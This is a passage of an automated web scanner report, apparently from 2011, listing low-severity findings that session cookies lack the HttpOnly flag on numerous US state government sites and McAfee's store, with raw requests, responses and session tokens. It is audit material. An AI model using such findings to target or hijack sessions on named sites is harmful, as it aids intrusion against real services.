Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 20:58:10 GMT
Content-Length: 36966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.56. https://home.mcafee.com/secure/purchase/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /secure/purchase/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/purchase/ HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/purchase/; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fpurchase%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:22 GMT
Content-Length: 37412
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.57. http://hpd.dnr.state.ga.us/content/displaycontent.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hpd.dnr.state.ga.us
Path:   /content/displaycontent.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/displaycontent.asp HTTP/1.1
Host: hpd.dnr.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 11:50:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /default.htm
Content-Length: 133
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQABBRRSD=LADPLBOBCDHGINLIALFJBDAK; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/default.htm">here</a>.</body>

14.58. http://il.gov/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://il.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: il.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Sat, 30 Apr 2011 01:26:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www2.illinois.gov/?ilgovdefault
Content-Length: 159
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQAQTABAB=GEMHCLEBNOBIOIIDHNHHAJLM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www2.illinois.gov/?ilgovdefault">here</a>.</body>

14.59. http://ilsapp.lib.de.us/uhtbin/cgisirsi/x/x/0/5  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ilsapp.lib.de.us
Path:   /uhtbin/cgisirsi/x/x/0/5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /uhtbin/cgisirsi/x/x/0/5 HTTP/1.1
Host: ilsapp.lib.de.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:03 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8f DAV/2
Expires: Thu, 29 Feb 1996, 10:27:00 GMT
Pragma: no-cache
Cache-Control: no-cache,must-revalidate,no-store
Set-Cookie: session_number=37040205; path=/
Connection: close
Content-Type: text/html
Content-Length: 8336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Copyright (c) 2000 - 2009, SirsiDynix - Defines the head body of each page. -->

<h
...[SNIP]...

14.60. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://joblink.alabama.gov
Path:   /ada/works/WorkforceCenter.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/WorkforceCenter.cfm HTTP/1.1
Host: joblink.alabama.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:21:34 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=6545172;expires=Mon, 22-Apr-2041 12:21:34 GMT;path=/
Set-Cookie: CFTOKEN=81fbc95d26faba7d-A65B55C9-2655-1FA7-D4A367D93293FAA3;expires=Mon, 22-Apr-2041 12:21:34 GMT;path=/
Set-Cookie: CFID=6545172;path=/
Set-Cookie: CFTOKEN=81fbc95d26faba7d%2DA65B55C9%2D2655%2D1FA7%2DD4A367D93293FAA3;path=/
Set-Cookie: TEST=1;path=/

Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th
...[SNIP]...

14.61. http://le.utah.gov/asp/lfa/lfareports.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://le.utah.gov
Path:   /asp/lfa/lfareports.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /asp/lfa/lfareports.asp HTTP/1.1
Host: le.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:21:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 897141
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASDRCQCR=BJMJDIOBMPHELJNECLLLDMJB; path=/
Cache-control: private


<html>
<head>
<title>Utah State Legislature - Legislative Fiscal Analyst</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<SCRIPT LANGUAGE=JAVASCRIPT TYPE="TEXT
...[SNIP]...

14.62. http://legis.state.la.us/main.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://legis.state.la.us
Path:   /main.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main.asp HTTP/1.1
Host: legis.state.la.us
Proxy-Connection: keep-alive
Referer: http://legis.state.la.us/main.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCAARADRS=JFJCGLCAOPDHMMCLHBDKEGHL

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:42:27 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 203694
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAAQBDQT=ONIDGLCADOJCAKFMFOLBBCLG; path=/
Cache-control: private


<HTML>
<HEAD>
<META HTTP-EQUIV=Refresh CONTENT=300>
<TITLE>Louisiana Legislature Home Page</TITLE>
<LINK REL="SHORTCUT ICON" HREF="http://www.legis.state.la.us/images/state.ico">


<script
...[SNIP]...

14.63. http://legis.state.la.us/main.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://legis.state.la.us
Path:   /main.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main.asp HTTP/1.1
Host: legis.state.la.us
Proxy-Connection: keep-alive
Referer: http://legis.state.la.us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:37:17 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 203694
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCTDCRT=NMAKINPCDDLANNNKMKLOBMEG; path=/
Cache-control: private


<HTML>
<HEAD>
<META HTTP-EQUIV=Refresh CONTENT=300>
<TITLE>Louisiana Legislature Home Page</TITLE>
<LINK REL="SHORTCUT ICON" HREF="http://www.legis.state.la.us/images/state.ico">


<script
...[SNIP]...

14.64. http://legis.state.la.us/main.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://legis.state.la.us
Path:   /main.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main.asp HTTP/1.1
Host: legis.state.la.us
Proxy-Connection: keep-alive
Referer: http://legis.state.la.us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:37:15 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 203694
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAARADRS=JFJCGLCAOPDHMMCLHBDKEGHL; path=/
Cache-control: private


<HTML>
<HEAD>
<META HTTP-EQUIV=Refresh CONTENT=300>
<TITLE>Louisiana Legislature Home Page</TITLE>
<LINK REL="SHORTCUT ICON" HREF="http://www.legis.state.la.us/images/state.ico">


<script
...[SNIP]...

14.65. https://license.ohio.gov/lookup/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://license.ohio.gov
Path:   /lookup/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lookup/default.asp HTTP/1.1
Host: license.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:22:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16380
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCASDBT=LEIBCKOBGPFJHLNMJNJCFAIA; path=/
Cache-control: private


<HTML>
<HEAD>
<link rel="stylesheet" type="text/css" href="/css/color_scheme.css">
<link rel="stylesheet" type="text/css" href="/css/main.css">
<title>License Search</title>

<SCRIPT ID=clie
...[SNIP]...

14.66. https://louisianadcpretire.gwrs.com/login.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://louisianadcpretire.gwrs.com
Path:   /login.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.do HTTP/1.1
Host: louisianadcpretire.gwrs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:22:11 GMT
Server: FASCore
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Content-Length: 10709
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=khX0N72Svxws3br!-1692232030!-1164814424; path=/
Content-Language: en-US
P3P: CP="ALL DSP COR CUR ADM DEV TAI HIS OUR OTRi BUS PHY ONL UNI FIN COM NAV INT DEM GOV"
Connection: close
Content-Type: text/html;charset=UTF-8

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"><head><script language="JavaScript" type="text/JavaScript">
<!--
function setFocus() {
document.getElementById("SSN").focus()
...[SNIP]...

14.67. http://maillist2.nh.gov/lists/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://maillist2.nh.gov
Path:   /lists/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lists/ HTTP/1.1
Host: maillist2.nh.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:22:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=9km2jdtpum75v4uoarm89n5pq4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2748
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html><head>
<meta http-equiv="Cache-Control" content="no-cache, must-revalidate" />
<meta ht
...[SNIP]...

14.68. http://mhcc.maryland.gov/consumerinfo/hospitalguide/hospital_guide/reports/find_a_hospital/index.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://mhcc.maryland.gov
Path:   /consumerinfo/hospitalguide/hospital_guide/reports/find_a_hospital/index.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /consumerinfo/hospitalguide/hospital_guide/reports/find_a_hospital/index.asp HTTP/1.1
Host: mhcc.maryland.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31713
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCQRQTQD=HLBOAAKBBABNFAKPNCPDMOIC; path=/
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:22:18 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html><!-- InstanceBegin template="/Templates/hospital_guide.dwt" codeOutsideHTMLIsLocked="f
...[SNIP]...

14.69. https://moversguide.usps.com/icoa/flow.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://moversguide.usps.com
Path:   /icoa/flow.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icoa/flow.do HTTP/1.1
Host: moversguide.usps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:23:20 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Length: 9281
Set-Cookie: JSESSIONID=00007vT2kFY8XM1A5vHT9odUlIA:137elttnv; Path=/
Keep-Alive: timeout=10, max=3
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: NSC_fbh-nh-qspe-xfc-443=ffffffff3b2217ab45525d5f4f58455e445a4a4212d3;Version=1;path=/;secure;httponly


<?xml version="1.0" encoding="UTF-8" ?>


<html>
<head>
<meta name="title" content="USPS - MoversGuide">
<meta name="author" content="USPS, Imagitas.">

...[SNIP]...

14.70. https://myalaska.state.ak.us/home/app  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://myalaska.state.ak.us
Path:   /home/app

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/app?service=external/launch&pubid=opc HTTP/1.1
Host: myalaska.state.ak.us
Connection: keep-alive
Referer: https://myalaska.state.ak.us/home/app
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:10:40 GMT
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 14:00:00 AKST
Set-Cookie: JSESSIONID=504573A026BB83CC1E30CCDAE8301E13; Path=/home; Secure
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 19943

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- Application: myalaskabarebones -->
<!-- Page: launch -->
<!-- Generated: Sat Apr 30 14:10:40
...[SNIP]...

14.71. http://nc.gov/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nc.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: nc.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NRVYIRS207.192.33.105CKOOL

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:51:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=e4vjyoyuuiyx2p45mwni1355; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9227


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>NCGOV - Page Not Found</title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
       <met
...[SNIP]...

14.72. http://ncchildcaresearch.dhhs.state.nc.us/search.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ncchildcaresearch.dhhs.state.nc.us
Path:   /search.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search.asp HTTP/1.1
Host: ncchildcaresearch.dhhs.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:43:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 70584
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACTBSQRB=KNOKANEBGOHFMJLJBNCLEOCJ; path=/
Cache-control: private

<!-- Setting up the data source. To change the Data Source used in this website,
change the DSN_Name -->


<html>
<head>
<title>NC Div of Child Development- Searching Resources in Child Care </
...[SNIP]...

14.73. http://nd.gov/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nd.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: nd.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:26 GMT
Server: IBM_HTTP_Server
Expires: Sat, 25 Dec 1993 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Length: 18409
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: JSESSIONID=0000qq8Xb-AeXn8AWyXQ1OrIPdu:13c99i0mh; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


